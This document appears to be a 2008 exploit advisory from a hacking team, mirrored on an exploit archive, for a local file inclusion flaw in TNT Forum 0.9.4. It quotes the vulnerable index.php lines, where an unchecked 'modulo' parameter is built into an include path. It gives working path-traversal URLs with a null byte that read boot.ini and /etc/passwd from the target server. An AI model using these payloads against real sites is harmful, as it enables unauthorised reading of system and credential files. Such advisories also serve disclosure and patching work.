[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : TNT Forum 0.9.4 Local File Inclusion Vulnerabilities
# Published : 2008-06-10
# Author : CWH Underground
# Previous Title : Todd Woolums ASP News Management 2.2 SQL Injection Vulnerabiltiy
# Next Title : Yuhhu 2008 SuperStar (board) Remote SQL Injection Exploit
======================================================
TNT Forum 0.9.4 Local File Inclusion Vulnerabilities
======================================================
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / ` /
/ XXXXXX /______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 10 June 2008
SITE : www.citec.us
#####################################################
APPLICATION : TNT Forum
VERSION : 0.9.4
DOWNLOAD : download.tntforum.tuttoeniente.net
#####################################################
---LFI---
#################################################################
Vulnerable in index.php:
137: //Variabili generali
138: $modulo = @$_GET['modulo'];
139: $modfile = 'mod_'.$modulo.'.php';
#################################################################
Exploit:
[+] For Windows
http://[Target]/[tntforum_path]/index.php?modulo=../../../../../../../../boot.ini%00
[+] For Linux
http://localhost/tntforum/index.php?modulo=../../../../../../../../etc/passwd%00
##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
##################################################################
# www.Syue.com [2008-06-10]